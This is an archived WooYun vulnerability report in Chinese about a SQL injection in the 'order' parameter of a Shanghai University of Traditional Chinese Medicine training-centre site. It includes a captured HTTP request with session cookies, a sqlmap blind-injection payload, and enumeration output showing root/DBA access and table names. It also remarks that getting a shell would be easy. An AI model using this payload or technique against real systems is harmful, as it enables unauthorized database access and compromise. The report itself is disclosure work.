乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
RT
http://cstc.shutcm.edu.cn/ 上海中医药大学临床技能实训中心
GET /index.php?option=com_gvsunvd&order=1&page=1&query=&range=all&sort=desc&type=1&view=search HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://cstc.shutcm.edu.cnCookie: 4b1e854185ff407f299fee72cc9f0083=lhuc2mdi1gbs7oi90nhf48c197; 4061268b622faf5442048572085f9200=774him6v53jlr7eogaee1qlh57; MoodleSession=iklt3ctdj48f51hq77vq6t8or1; JSESSIONID=8E66120270E1133222F11778AFA37BC7Host: cstc.shutcm.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
order参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: order (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: option=com_gvsunvd&order=1 RLIKE (SELECT (CASE WHEN (4952=4952) THEN 1 ELSE 0x28 END))&page=1&query=&range=all&sort=desc&type=1&view=search---web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5current user: 'root@%'current database: 'cstc'current user is DBA: Trueavailable databases [7]:[*] cstc[*] information_schema[*] moodle[*] mysql[*] performance_schema[*] survey[*] test
back-end DBMS: MySQL 5[13:37:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables[13:37:16] [INFO] fetching tables for database: 'cstc'[13:37:16] [INFO] fetching number of tables for database 'cstc'[13:37:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:37:16] [INFO] retrieved: 100[13:37:22] [INFO] retrieved: hji2n_acepolls_options[13:38:36] [INFO] retrieved: hji2n_acepolls_polls[13:39:04] [INFO] retrieved: hji2n_acepolls_votes[13:39:32] [INFO] retrieved: hji2n_assets[13:39:54] [INFO] retrieved: hji2n_associations[13:40:32] [INFO] retrieved: hji2n_banner_clients[13:41:23] [INFO] retrieved: hji2n_banner_tracks[13:41:52] [INFO] retrieved: hji2n_banner[13:42:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)s[13:42:35] [INFO] retrieved: hji2n_categories[13:43:11] [INFO] retrieved: hji2n_contact_details[13:44:01] [INFO] retrieved: hji2n_content[13:44:19] [INFO] retrieved: hji2n_content_frontpage[13:45:01] [INFO] retrieved: hji2n_content_rating[13:45:31] [INFO] retrieved: hji2n_core_log_searches[13:46:26] [INFO] retrieved: hji2n_cstc_bases[13:47:01] [INFO] retrieved: hji2n_cstc_colleges[13:47:38] [INFO] retrieved: hji2n_cstc_degrees[13:48:13] [INFO] retrieved:[13:48:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)hji2n_cstc_disciplines[13:49:26] [INFO] retrieved: hji2n_cstc_dissubjects[13:50:01] [INFO] retrieved: hji2n_cstc_durations[13:50:37] [INFO] retrieved: hji2n_cstc_educations[13:51:21] [INFO] retrieved: hji2n_cstc_examr[13:52:15] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)ecords[13:52:35] [INFO] retrieved: hji2n_cstc_examrooms[13:53:02] [INFO] retrieved: hji2n_cstc_exams[13:53:16] [INFO] retrieved: hji2n_cstc_langmaps[13:53:50] [INFO] retrieved: hji2n_cstc_mapexaminer[13:54:40] [INFO] retrieved: hji2n_cstc_mapquestion[13:55:18] [INFO] retrieved: hji2n_cstc_mapquestiongroup[13:55:49] [INFO] retrieved: hji2[13:56:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)n_cstc_provinces[13:57:01] [INFO] retrieved: hji2n_cstc_questiong[13:58:10] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)roups[13:58:26] [INFO] retrieved: hji2n_cstc_questionmedias[13:58:57] [INFO] retrieved: hji2n_cstc_questions[13:59:14] [INFO] retrieved: hji2n_cstc_rooms[13:59:39] [INFO] retrieved: hji2n_cstc_students[14:00:14] [INFO] retrieved: hji2n_cstc_subjects[14:00:45] [INFO] retrieved: hji2n_cstc_subquesti
DBA权限,比较容易写shell,降权吧,多处注入
危害等级:中
漏洞Rank:6
确认时间:2015-12-08 12:24
数据库端口已通过系统防火墙封闭,校园网无法访问到
暂无